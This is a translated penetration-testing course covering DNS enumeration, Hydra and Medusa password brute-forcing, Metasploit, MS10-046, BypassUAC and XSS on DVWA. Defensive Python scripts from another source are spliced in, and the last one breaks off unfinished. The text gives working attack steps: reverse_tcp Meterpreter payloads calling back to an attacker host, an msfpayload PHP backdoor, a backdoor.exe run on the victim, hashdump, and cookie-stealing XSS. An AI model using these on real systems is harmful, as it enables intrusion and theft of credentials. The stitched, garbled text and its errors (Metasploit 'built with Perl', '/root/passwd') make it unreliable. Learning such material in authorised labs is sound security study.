DNS Enumeration is the process of locating all the DNS servers and their corresponding records for an organization. A company may have both internal and external DNS servers that can yield information such as user names, computer names and IP addresses of potential target systems. There are many tools that can be used to gather information for DNS enumeration. Examples of tools that can be used for DNS enumeration are nslookup, dig, the American Registry for Internet Numbers (ARIN), and Whois. To enumerate DNS we must understand DNS and how it works, and we must know the DNS record types. The list of DNS records gives an overview of the resource record types (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database of information associated with Internet domain names and addresses. In these zones, different record types serve different purposes. The following list describes the common DNS record types and their uses:
A (address) - Maps a host name to an IP address
SOA (Start of Authority) - Identifies the DNS server responsible for the domain's information
CNAME (canonical name) - Provides an additional name or alias for an address record
MX (mail exchange) - Identifies the mail servers for the domain
SRV (service) - Identifies services such as directory services
PTR (pointer) - Maps an IP address to a host name
NS (name server) - Identifies other name servers for the domain
DNS Zone Transfer is normally used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server performs a zone transfer request for a specific zone from a name server. If the name server allows the zone transfer to take place, all the DNS names and IP addresses hosted by that name server are returned as human-readable ASCII text. Nslookup
We can also run the command directly as follows: nslookup -type=any tuoitre.vn Type is the kind of network service, as listed above: NS (nameserver), MX (mail exchange), any (all). Tuoitre.vn: a domain
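The defensive counterpart of the zone transfer and record list described above is to review what a zone actually discloses. The following Python script is an added example, not part of the original document: it parses a constructed zone-transfer style listing for the reserved documentation domain example.com, counts the record types named above, and flags A records that point at RFC 1918 addresses or at hostnames that suggest internal infrastructure. The keyword list and sample records are assumptions for the demonstration.

```python
"""Review a DNS zone dump for information leakage (added example)."""
import ipaddress
from collections import Counter

# Constructed zone listing in "name TTL IN TYPE data" form, as a zone transfer
# or a dig AXFR would print it. example.com is a reserved documentation domain.
SAMPLE_ZONE = """\
example.com.            3600 IN SOA   ns1.example.com. hostmaster.example.com. 2012010101 7200 900 1209600 3600
example.com.            3600 IN NS    ns1.example.com.
example.com.            3600 IN NS    ns2.example.com.
example.com.            3600 IN MX    10 mail.example.com.
ns1.example.com.        3600 IN A     203.0.113.10
ns2.example.com.        3600 IN A     203.0.113.11
mail.example.com.       3600 IN A     203.0.113.25
www.example.com.        3600 IN CNAME web01.example.com.
web01.example.com.      3600 IN A     203.0.113.80
intranet.example.com.   3600 IN A     10.0.5.20
backup-db.example.com.  3600 IN A     192.168.1.50
_ldap._tcp.example.com. 3600 IN SRV   0 5 389 dc01.example.com.
dc01.example.com.       3600 IN A     10.0.5.1
"""

# RFC 1918 address space: these should never appear in an externally served zone.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Hostname prefixes that hint at internal systems (assumed list, tune per organisation).
SENSITIVE_PREFIXES = ("intranet", "backup", "dc", "vpn", "test", "dev")


def parse_zone(text):
    """Parse one record per line; comment lines (;) and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split()
        if len(parts) < 5 or parts[2] != "IN":
            continue
        name, ttl, _cls, rtype = parts[:4]
        records.append({"name": name, "ttl": int(ttl), "type": rtype, "data": " ".join(parts[4:])})
    return records


def summarize(records):
    """Count records per type (A, NS, MX, ...), the overview a reviewer looks at first."""
    return Counter(r["type"] for r in records)


def internal_exposure(records):
    """A records whose address is RFC 1918: internal topology leaked to the outside."""
    leaks = []
    for r in records:
        if r["type"] != "A":
            continue
        ip = ipaddress.ip_address(r["data"])
        if any(ip in net for net in RFC1918):
            leaks.append((r["name"], r["data"]))
    return leaks


def sensitive_names(records, prefixes=SENSITIVE_PREFIXES):
    """Hostnames whose first label suggests an internal or non-production system."""
    hits = set()
    for r in records:
        label = r["name"].split(".")[0].lower()
        if any(label.startswith(p) for p in prefixes):
            hits.add(r["name"])
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_zone(SAMPLE_ZONE)
    print("record types:", dict(summarize(recs)))
    print("internal addresses exposed:", internal_exposure(recs))
    print("suspicious hostnames:", sensitive_names(recs))
```

Run against a real zone, a non-empty result from internal_exposure means the zone should be split (separate internal and external views) and zone transfers restricted to the secondary name servers only.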
3. NetBIOS name
NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model that let applications on separate computers communicate over a local area network. Strictly speaking NetBIOS is an API, not a network protocol. Older operating systems ran NetBIOS over IEEE 802.2 and IPX/SPX using the NetBIOS Frames (NBF) protocol and NetBIOS over IPX/SPX (NBX) respectively. In modern networks NetBIOS normally runs over TCP/IP via the NetBIOS over TCP/IP (NBT) protocol. As a result, every computer on the network has a NetBIOS name and an IP address corresponding to a (possibly different) host name. A NetBIOS name is a naming mechanism for the resources of a system in a flat namespace (there is no notion of hierarchy).
Chapter 5: PASSWORD CRACKING
I. Introduction
Password cracking is the process of finding or recovering passwords, for a variety of purposes.
The purpose of password cracking is to help a user recover a previously forgotten password, or to gain unauthorized access to a system.
II. Password Cracking Techniques
1. Dictionary Attacks
Uses a ready-made dictionary file of hashes to compare against the password hash and recover the plain text form of the password whenever the hashes match. We can also add to or permute the words in the dictionary (Hybrid Attacks). This form works well when the password consists of ordinary characters; it is fast, and the success rate depends on the dictionary.
2. Brute Forcing Attacks
Feeds every combination of all characters into the hash function and compares. Success is guaranteed given enough time, but cracking is very slow when the password is long and complex. It is only good for short passwords.
3. Syllable Attacks/Pre-Computed Hashes
Combines the two approaches above by precomputing hash tables of all character combinations and only comparing during the cracking process. Cracking takes just a few minutes when the hash tables are available.
III. Common Attack Types
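Precomputed tables work only because the same password always yields the same hash. The Python below is an added example, not from the original document: it builds a precomputed table of unsalted SHA-256 digests from a constructed word list, recovers an unsalted stored hash with a single lookup, and then shows that a per-account random salt with PBKDF2-HMAC-SHA256 (the storage scheme assumed here) makes the same table useless. The accounts and word list are constructed sample data.

```python
"""Precomputed hash tables versus salted password storage (added example)."""
import hashlib
import hmac
import os

# Constructed word list of the kind a dictionary attack would use.
WORDLIST = ["password", "123456", "summer2012", "letmein", "qwerty"]


def build_table(words):
    """Precompute unsalted SHA-256 once; the same table serves against every account."""
    return {hashlib.sha256(w.encode()).hexdigest(): w for w in words}


def unsalted_store(password):
    """Weak storage: plain SHA-256 of the password, identical for every user with that password."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_with_table(records, table):
    """One dictionary probe per stolen hash, no hashing at all; returns {user: password}."""
    return {user: table[h] for user, h in records.items() if h in table}


def salted_store(password, iterations=100_000):
    """Record format salt$iterations$digest; a fresh 16-byte salt per account."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()
    return f"{salt.hex()}${iterations}${digest}"


def salted_verify(password, record):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, iterations, digest = record.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    ).hex()
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    table = build_table(WORDLIST)
    stolen_unsalted = {"alice": unsalted_store("summer2012"), "bob": unsalted_store("Tr0ub4dor&3")}
    print("unsalted records cracked by table lookup:", crack_with_table(stolen_unsalted, table))
    alice = salted_store("summer2012")
    stolen_salted = {"alice": alice.split("$")[2]}
    print("salted records cracked by table lookup:", crack_with_table(stolen_salted, table))
    print("login with correct password:", salted_verify("summer2012", alice))
```

With salts the attacker has to hash the whole word list again for every account, and the iteration count makes each of those hashes expensive; that is what turns a minutes-long table lookup back into a slow per-account guess.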
1. Active Password Cracking
Find a plausible username and then guess the password for that username. The process can be automated to speed up the search. The forms of Active Password Cracking are: o Password guessing: a dictionary of words and names is used as the password set and every combination is tried in order to crack the passwords. This kind of attack takes a lot of time and network bandwidth, and is easily detected. o Trojan/Spyware/Keylogger: programs that run in the background and let the attacker record every key pressed (Keylogger); secretly collect information about individuals and organizations (Spyware); with the help of a Trojan the attacker can gain access to stored passwords, read private documents and delete files.
2. Passive Password Cracking
Capture the login process on the wire and break the password offline (Sniffing, MITM). These attacks include: o Wire Sniffing: the attacker runs packet-sniffing tools on the LAN to access and record the live network traffic. The captured data may include passwords sent to remote systems in Telnet, FTP and rlogin sessions and in e-mail sent and received. o Man-in-the-Middle (MITM) and Replay Attack: in a MITM attack the attacker gains access to the communication channel between the victim and the server to look for information; in a replay attack, packets and authentication tokens are captured with a sniffer.
3. Offline Password Cracking
Physical access to the victim's computer in order to copy the files that store the information. For example, the SAM database on Windows (%systemroot%/system32/config) or /root/passwd on Linux. John can then be used to recover the plain text passwords.
IV. Password Cracking Tools
1. Hydra
a) Introduction
Hydra is a very fast network login cracker that supports many different protocols and services. Hydra is a parallelized login cracker, meaning that it runs many tasks at the same time so that cracking goes faster. The tool lets researchers and security specialists demonstrate how easy it is to gain unauthorized remote access to a system.
b) Usage
The general syntax of Hydra is: hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t task] [-w wait] [server server | IP] [service://server[:port]]
Example (figure: login.txt, password.txt, 192.168.10.1, http-get):
-f: finish: stop as soon as the first valid username and password pair is found -L: username file (-l username) -P: password file (-p password) 192.168.10.1: the IP address whose login password is being cracked http-get: the HTTP service on port 80 (http is replaced by http-get or http-head) http://192.168.10.1 is the web page needed for the cracking process.
2. Medusa
a) Introduction
Medusa can be used to brute-force logins module by module, in parallel and quickly. Its goal is to support as many services that allow remote authentication as possible. Medusa is designed around the following three characteristics: Thread-based parallel testing: it can test many hosts, usernames and passwords at once. Modular design: each service exists as an independent (.mod) file. The core does not need to be modified to extend the list of services supported for brute-forcing.
b) Usage
Syntax: medusa [-h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] -M module [OPT] -h host or IP address, -H file containing the hosts
-u username, -U file containing usernames -p password, -P file containing passwords -C file combining host, username and password in the form host:username:password -M module is mandatory and is followed by the name of a supported module. To see all modules type: medusa -d and for detailed usage of a given module: medusa -M module_name -q
V.
This is the hypertext transfer protocol, commonly used by Web applications (World Wide Web, WWW) on the default port 80.
d) HTTP has two authentication schemes:
Basic access authentication: a method by which a web browser or other program supplies a username and password when asked. It is supported by every web browser; however, both the username and the password are sent as plain text, so it is rarely used in practice. Logging in to a router is a typical example.
As the figure shows, the captured username and password are admin:12345. Digest access authentication: one of the agreed methods by which a web server can exchange credentials with the user's web browser. It uses a hash function to encode the sensitive information before sending it over the network.
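To make concrete what the capture in the figure shows, the following Python is an added example, not from the original document: it parses two constructed HTTP requests and reports what a passive observer on the path would recover from each. The Basic request carries the admin:12345 pair from the figure; the realm, nonce and response value in the Digest request are placeholders, and the over_tls flag models whether the connection was encrypted.

```python
"""What a network observer recovers from HTTP Basic vs Digest authentication (added example)."""
import base64
import re

# Constructed request 1: Basic authentication with the credentials from the figure.
BASIC_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 192.168.10.1\r\n"
    "Authorization: Basic " + base64.b64encode(b"admin:12345").decode() + "\r\n"
    "\r\n"
)

# Constructed request 2: Digest authentication; realm, nonce and response are placeholders.
DIGEST_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 192.168.10.1\r\n"
    'Authorization: Digest username="admin", realm="router", nonce="placeholder-nonce", '
    'uri="/", response="0123456789abcdef0123456789abcdef"\r\n'
    "\r\n"
)

DIGEST_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, target and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def inspect_authorization(request, over_tls):
    """Describe what a sniffer on the wire learns from the Authorization header."""
    hidden = {"scheme": None, "username": None, "password": None, "exposed": False}
    if over_tls:
        return dict(hidden, finding="TLS hides the Authorization header from a sniffer")
    auth = request["headers"].get("authorization")
    if auth is None:
        return dict(hidden, finding="no credentials in this request")
    scheme, _, value = auth.partition(" ")
    scheme = scheme.lower()
    if scheme == "basic":
        # Base64 is an encoding, not encryption: the pair is fully readable.
        user, _, password = base64.b64decode(value).decode().partition(":")
        return {"scheme": "Basic", "username": user, "password": password, "exposed": True,
                "finding": "username and password readable in clear"}
    if scheme == "digest":
        fields = {m.group(1): m.group(2) or m.group(3) for m in DIGEST_FIELD.finditer(value)}
        return {"scheme": "Digest", "username": fields.get("username"), "password": None,
                "exposed": False,
                "finding": "only a hash is sent; still guessable offline, so use TLS as well"}
    return dict(hidden, scheme=scheme, finding="unrecognised scheme")


if __name__ == "__main__":
    for raw in (BASIC_REQUEST, DIGEST_REQUEST):
        print(inspect_authorization(parse_request(raw), over_tls=False))
```

The practical rule this illustrates: Basic authentication is acceptable only over TLS, and Digest still exposes a hash that can be attacked offline, so neither should be trusted on a plain port 80 connection.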
e) Cracking HTTP passwords
In a Terminal on BackTrack 5 type: hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1 Where: -f: finish: stop as soon as the first valid username and password pair is found -L: username file (-l username) -P: password file (-p password) 192.168.10.1: the IP address whose login password is being cracked http-get: the HTTP service on port 80 (http is replaced by http-get or http-head) http://192.168.10.1 is the web page needed for the cracking process.
Or: medusa -h 192.168.10.1 -U login.txt -P password -M http Where: -h the host or IP address whose login password is being cracked. -U: username file (-u username) -P: password file (-p password) -M http the protocol to crack. -M stands for module
SSH is a network protocol for secure data communication, remote shell services or command execution, and other secure network services between networked computers. It connects a server and a client (running the SSH server and SSH client programs) through a secure channel over an insecure network. The best known use of the protocol is access to shell accounts on UNIX-like operating systems (Linux). It was created to replace insecure protocols such as telnet, rsh and rexec, in which the password is sent as plain text and can easily be read. SSH runs on TCP port 22.
b) Cracking passwords over SSH
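The HTTP and SSH cracking runs above leave the same footprint: many failed logins from one source in a short time, which is exactly why the text calls password guessing easy to detect. The Python below is an added example, not from the original document: it parses constructed Apache access-log lines (401 responses) and sshd "Failed password" lines, then raises an alert for any source and service that exceeds a threshold of failures inside a sliding window. The threshold, window and log lines are assumptions for the demonstration.

```python
"""Detect login brute-forcing from HTTP 401s and sshd failures (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache combined/common log: ip - - [dd/Mon/yyyy:HH:MM:SS +zzzz] "request" status size
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]\s]+) [^\]]+\] "[^"]*" (\d{3}) ')
# sshd syslog line: Mon dd HH:MM:SS host sshd[pid]: Failed password for [invalid user] U from IP port N
SSHD_RE = re.compile(
    r'^(\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for '
    r'(?:invalid user )?(\S+) from (\S+) port'
)


def parse_apache(line):
    """Return (time, source_ip, 'http', None) for a 401 response, else None."""
    m = APACHE_RE.match(line)
    if not m or m.group(3) != "401":
        return None
    ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S")
    return (ts, m.group(1), "http", None)


def parse_sshd(line, year=2012):
    """Return (time, source_ip, 'ssh', user) for a failed password, else None.
    syslog lines carry no year, so it is supplied by the caller."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return (ts, m.group(3), "ssh", m.group(2))


def detect_bursts(events, threshold=5, window_seconds=60):
    """Alert per (source, service) whose failures inside any window reach the threshold."""
    by_source = defaultdict(list)
    for ts, ip, service, _user in events:
        by_source[(ip, service)].append(ts)
    alerts = []
    for (ip, service), times in sorted(by_source.items()):
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):           # two-pointer sliding window
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"source": ip, "service": service,
                           "failures": len(times), "peak_in_window": peak})
    return alerts


def make_sample_logs():
    """Constructed logs: one noisy source hammering HTTP and SSH, one ordinary user."""
    apache, sshd = [], []
    for i in range(12):
        apache.append(f'192.168.10.102 - - [15/Aug/2012:10:21:{i:02d} +0700] "GET / HTTP/1.0" 401 381')
    apache.append('192.168.10.50 - - [15/Aug/2012:10:25:10 +0700] "GET / HTTP/1.1" 401 381')
    apache.append('192.168.10.50 - - [15/Aug/2012:10:25:30 +0700] "GET / HTTP/1.1" 200 1532')
    for i in range(8):
        sshd.append(f'Aug 15 10:22:{i:02d} bt sshd[2210]: Failed password for root '
                    f'from 192.168.10.102 port {40100 + i} ssh2')
    sshd.append('Aug 15 10:30:00 bt sshd[2251]: Accepted password for user from 192.168.10.50 port 40200 ssh2')
    return apache, sshd


def analyse(apache_lines, sshd_lines, threshold=5, window_seconds=60):
    events = [e for e in map(parse_apache, apache_lines) if e]
    events += [e for e in (parse_sshd(l) for l in sshd_lines) if e]
    return detect_bursts(events, threshold, window_seconds)


if __name__ == "__main__":
    for alert in analyse(*make_sample_logs()):
        print(alert)
```

The same two-pointer window is what tools such as fail2ban implement behind their filters; the alert output is the point at which a block rule or account lockout would be applied.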
SMB, also known as the Common Internet File System (CIFS), operates at the application layer of the OSI model and is commonly used to provide shared access to files, printers and various communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most uses of SMB involve Microsoft Windows. SMB can run on top of the session layer or lower: o Directly over TCP port 445; o Through NetBIOS (which provides services related to the application layer of the OSI model, letting applications on separate computers communicate over the LAN) on UDP ports 137 and 138 and TCP ports 137 and 139.
b) Cracking SMB passwords
Scan to see whether any host is running the SMB service on port 445.
RDP is a proprietary protocol developed by Microsoft that gives a user a graphical interface to another computer. Microsoft now ships the RDP server software as Remote Desktop Services, formerly Terminal Services, and the client software as Terminal Services Client. When connecting to a remote computer we are asked for a matching user name and password. So cracking the RDP password is necessary if we want access without the user's consent. RDP runs on TCP port 3389.
b) Cracking RDP passwords
Medusa does not support the RDP protocol directly. However, we can use the wrapper module with rdesktop as the script. We proceed as follows:
medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -h 192.168.10.100 -U login.txt -P password.txt Even so, the program does not work very well and takes a lot of time, because the attacker has to enter the passwords one at a time. This is how rdesktop is used to control the remote computer with the username and password found:
Chapter 6: SYSTEM HACKING
I. INTRODUCTION TO METASPLOIT
1. Introduction
Metasploit is a computer security project that provides information about security vulnerabilities and assists with penetration testing and with developing intrusion detection systems. A very well known sub-project of Metasploit is the Metasploit Framework. The Metasploit Framework is an environment for testing, attacking and exploiting flaws in services. Metasploit is built with the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows, MacOS. The program can be downloaded from www.metasploit.com; the current version of Metasploit is 4.4.
2. Metasploit components
Metasploit offers several user interfaces:
Console interface: the msfconsole command. The msfconsole interface uses command lines for configuration and testing, so it is faster and more flexible.
Web interface: msfweb, which interacts with the user through a web interface.
Command line interface: msfcli.
Environment:
Global Environment: managed with the two commands setg and unsetg; options set here are global and are applied to every exploit module.
Temporary Environment: managed with the two commands set and unset; this environment applies only to the exploit module currently loaded and does not affect other exploit modules.
We can save the environment we have configured with the save command. The environment is stored in ./msf/config and is loaded again when the user interface starts.
3. Using the Metasploit Framework
a) Choosing an exploit module
show exploits: list the exploit modules the framework supports. use exploit_name: select an exploit module. info exploit_name: show information about the exploit module. We should regularly update the service vulnerabilities and the modules from www.metasploit.com, with the msfupdate command, or with svn update /opt/metasploit/msf3/
b) Configuring the chosen exploit module
show options: shows which options need to be configured. set: configures the module's options. Some modules also have advanced options, which we can view with the show advanced command.
c) Verifying the options just configured
d) Choosing which operating system to target: show targets: the targets provided by the module. set: selects a target. Example: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) Choosing a payload
A payload is the piece of code that will run on the remote system; it is the part of a computer virus that executes the malicious code. show payloads: lists the payloads for the current exploit module. info payload_name: shows detailed information about the payload. set payload payload_name: selects the payload module by name. After choosing a payload, use show options to see the payload's options and show advanced to see the payload's advanced options.
f) Running the exploit
exploit: the command that runs the payload code. The payload then gives us information about the exploited system.
4. Introducing the Meterpreter payload
Meterpreter, short for Meta-Interpreter, is an advanced payload included in the Metasploit Framework. Its purpose is to provide command sets for exploiting and attacking remote computers. It was written by its developers as shared object (DLL) files. Meterpreter and its extensions execute in memory and are never written to disk, so they can evade detection by anti-virus software. Meterpreter provides a set of commands we can use on remote computers: Fs (Filesystem): interaction with the file system. Net: viewing the remote machine's network information such as IP and routing table. Process: interacting with processes on the remote machine. Sys: viewing the remote machine's system and environment information.
a) Using the Fs module
cd directory: like the command-line cd, changes the working directory. getcwd: shows the current working directory. ls: lists directories and files. upload src1 [src2 ...] dst: uploads files from src to dst. download src1 [src2 ...] dst: downloads files from src to dst.
b) Using the Net module
ipconfig: shows the network interface configuration of the remote computer. route: shows the remote machine's routing table.
c) Using the Process module
execute -f file [-a args] [-Hc]: the execute command creates a new process on the remote machine and uses that process to extract data. kill pid1 pid2 pid3: terminates processes running on the remote machine. ps: lists the remote machine's processes.
d) Using the Sys module
getuid: shows the current username on the remote machine. sysinfo: shows information about the victim machine: operating system, version, and whether the platform is 32-bit or 64-bit.
Apply Microsoft's patches regularly. For example, so that Metasploit cannot exploit the Lsass_ms04_011 bug, we must install Microsoft's patch. Microsoft rates it a critical bug, present in almost all versions of Windows. We should use hotfix number 835732 to fix it.
II. The MS10-046 vulnerability (2286198)
1. Introduction
This is a very serious Windows Shell bug affecting all listed operating systems; it lets an attacker take complete control of Windows and execute code remotely. The bug was discovered in June 2010 and Microsoft released a patch in August 2010. The dangerous flaw lies in Windows "shortcut" (*.lnk) files, which are usually found on the desktop or in the Start menu. By crafting a shortcut file embedding malicious code, an attacker can have that code executed automatically when the user views the shortcut or the contents of a folder that contains the malicious shortcut. The affected versions of Windows include:
Operating system
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems*
Windows Server 2008 R2 for Itanium-based Systems
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 with SP2 for Itanium-based Systems
Windows Vista Service Pack 1 and Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
2. Attack steps:
Use the command show options to see the parameters needed before the attack can proceed: o SRVHOST: the attacker's address, which listens for a victim to connect. o SRVPORT: the listening port, by default http (80)
We then run: o set PAYLOAD windows/meterpreter/reverse_tcp o set SRVHOST 192.168.1.200 o set the lhost IP address: set LHOST 192.168.1.200. LHOST is a parameter of the PAYLOAD we have just set.
On the victim machine, create a shortcut by right-clicking the Desktop -> New -> Shortcut
From here on everything becomes easier, once the attacker has full control of the victim's machine. For example: the sysinfo command retrieves the victim machine's information; the hashdump command retrieves the users' passwords as hashes.
The patch, code-named KB2286198, contains a new version of the file Shell32.dll; this is an important update. Shell32.dll is a very important library file in Windows, containing a number of Windows Shell API functions. If Shell32.dll is faulty or incorrectly updated, the computer will show the "Blue Screen of Death".
III. The BYPASSUAC vulnerability
1. Introduction
Starting with Windows Vista, Microsoft introduced a built-in feature called User Access Control (UAC). UAC increases the security of Windows by limiting application software to the privileges of a standard user. Only software the user trusts is granted administrative rights; other software is not. However, even under an administrator account, applications are restricted just as they are for ordinary accounts. All operating systems with User Access Control built in are affected and can be exploited.
2. Attack steps
use exploit/multi/handler. This module provides many functions of the Metasploit payload system for us to exploit, for example by running post/windows/escalate/bypassuac in this case, and much more. set PAYLOAD windows/meterpreter/reverse_tcp: lets the victim connect back to the attacking machine so it can be controlled easily. set LHOST 192.168.1.202: the listening host, the attacking machine's IP address. set LPORT 6789: the listening port, any port that is not already in use.
Once it has been created, we copy the file backdoor.exe to the victim machine and run it. Samba can be used to share files between Windows and Linux. On the Windows machine we share the file with full access:
Back on the victim machine, run the backdoor.exe file that was just copied. On the attacking machine we then see the following:
We have a session but it does not yet have full control. To get it we need to run the command: run post/windows/escalate/bypassuac
Unfortunately, as of this writing Microsoft has neither acknowledged a bug in UAC nor provided a patch for this security hole. A Microsoft spokesperson stated that there is no vulnerability in UAC at all. We should therefore install reputable anti-virus and anti-backdoor software to avoid being exploited.
Chng 7:
I. Introduction
For those of us who are new to studying hacking, a practice environment is very important, but finding a realistic environment suited to our level is not easy. Conversely, those with hacking skill and experience surely also want to test how far their skill goes and to improve it. DVWA (Damn Vulnerable Web Application) meets the needs of both newcomers and people with a certain level of skill. DVWA is a framework with pre-built security holes following the OWASP Top 10 web security weaknesses. Its levels from low to high can satisfy the needs of a great many people. DVWA is thus a vulnerable PHP/MySQL web application. Its main goals are to help security professionals test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to help teachers and students teach and learn web application security in a classroom setting.
II. Installing DVWA on BackTrack
Since this is a PHP framework, the simplest approach is to set up a web server with XAMPP first, then copy DVWA into it; we will use DVWA through its web interface.
1. Download and install XAMPP
Start XAMPP
Finally, open a web browser and type http://localhost to get the main XAMPP page as shown below:
2. Download and install DVWA
Note: XAMPP must be started before DVWA can run. On the DVWA login page, log in with the default account/password admin/password. Preparation before the attack: open a web browser and type localhost/dvwa. You can also use ip_address/dvwa
To exploit the flaws in DVWA (XSS, SQL Injection) we must set the Security Level to Low, because at that level the code we inject is kept unchanged. At the High level the htmlspecialchars() function converts special characters so the input no longer matches what was originally entered. At the Medium level the string <script> is removed, so that tag has no effect; other HTML tags, however, still take effect as usual. We therefore set the Security Level to low: choose DVWA Security -> Low -> Submit
Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with HTML's Cascading Style Sheets), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script code that can harm other users. The dangerous code injected is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and may also be HTML tags. XSS is one of the most common flaws; a great many websites suffer from it, which is why more and more people are paying attention to it!
b) Types of XSS
Stored XSS is the form of attack in which the attacker injects a dangerous script (usually JavaScript) into our website through some feature (e.g. comments, guestbook, posting), so that other members who visit the site are hit by the attacker's malicious code. Because this code is usually stored in the website's database, it is called Stored. Stored XSS arises when we do not filter the data submitted by members properly, letting the malicious code be saved in the website's database.
In the reflected form, the attacker typically appends malicious code to a URL of our website and sends it to the victim; if the victim opens the URL, the malicious code runs. This happens because we do not filter the input arriving from the website's URL.
The third form is similar to the two above; the difference is the way the payload is delivered to the server.
XSS Attack Consequences
Even a read-only or brochureware site can be vulnerable to XSS. XSS can cause damage ranging from minor to major, such as taking over a user's account. An XSS attack can steal the session cookie and cost the user their account. It can also affect end-user data by installing a Trojan, redirecting the visitor to another page, or changing the content of a page.
c) How XSS works
Description of how XSS works. By the principle above, a hacker can take advantage of security holes in a website. Any HTML tag can serve as a tool for an X SS attack; in particular the IMG and IFRAME tags can make the browser load other websites when the HTML is rendered. Exploiting this principle, hackers can inject malicious code and have the victim's machine fall to an XSS attack.
d) Impact of XSS
XSS is commonly used for the following purposes: stealing information; giving the hacker access to sensitive information; obtaining free access to content that should be paid for; spying on users' browsing habits; changing the appearance of (defacing) a web page; denial of service (DoS). Malicious JavaScript can access any of the following: - Persistent cookies (of the site with the XSS flaw) kept by the browser. - In-memory cookies (of the site with the XSS flaw). - The names of all windows opened from the vulnerable site. - Any information reachable from the current DOM (such as values and HTML code).
e) XSS attack
Run the script: <script>alert('XSS');</script> to show an alert box in the web browser
We can send this cookie straight to the attacking machine instead of just showing it on screen. We can also inject iframe tags: <iframe src=http://www.ctu.edu.vn></iframe>
In addition, we can use the Metasploit Framework (introduced above) to attack and take control, together with a backdoor that lets the target machine connect back. Code to create the backdoor: msfpayload php/meterpreter/reverse_tcp lhost=192.168.10.102 lport=4444 R > forum.php
After the script above runs, the Metasploit Framework opens the connection and we can attack.
Some screenshots of the attack:
Nobody can fully measure how dangerous XSS is, but preventing XSS is not too difficult. There are many ways to solve the problem. OWASP (The Open Web Application Standard Project) says that to build highly secure websites, for user-supplied data one should: accept only valid data; refuse corrupt data; continuously check and sanitize the data. Web developers can protect their sites from XSS attacks by ensuring that dynamically generated pages contain no script tags, by filtering and validating user input, or by encoding and filtering the values output to the user.
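The three DVWA security levels described earlier (Low keeps the input, Medium removes the string <script>, High applies htmlspecialchars()) are the difference between the blacklist and output encoding that the paragraph above recommends. The Python below is an added example, not from the original document or from DVWA: it stands in for DVWA's PHP, renders the two payloads quoted in this section through each behaviour, and uses a small detector to show which renderings still carry live markup. The page template and the case-variant payload are assumptions for the demonstration.

```python
"""Blacklisting versus output encoding against XSS, DVWA-style (added example)."""
import html
import re

# Payloads quoted in the text, plus one case variant to probe the blacklist.
SCRIPT_PAYLOAD = "<script>alert('XSS');</script>"
IFRAME_PAYLOAD = "<iframe src=http://www.ctu.edu.vn></iframe>"
CASE_VARIANT = "<ScRiPt>alert('XSS');</ScRiPt>"

# Constructed guestbook page; {entry} is where user-supplied text lands.
PAGE = "<html><body><h2>Guestbook</h2><p>{entry}</p></body></html>"


def render_low(entry):
    """Untrusted text dropped straight into the page: stored/reflected XSS."""
    return PAGE.format(entry=entry)


def render_medium(entry):
    """Blacklist: only the literal lowercase '<script>' is removed (case-sensitive)."""
    return PAGE.format(entry=entry.replace("<script>", ""))


def render_high(entry):
    """Output encoding: every markup-significant character becomes an entity."""
    return PAGE.format(entry=html.escape(entry, quote=True))


# Tags and attributes that execute or load content when the browser parses them.
ACTIVE_MARKUP = re.compile(r"<\s*(script|iframe|img|object|embed)\b|\bon\w+\s*=", re.IGNORECASE)


def user_part(rendered_page):
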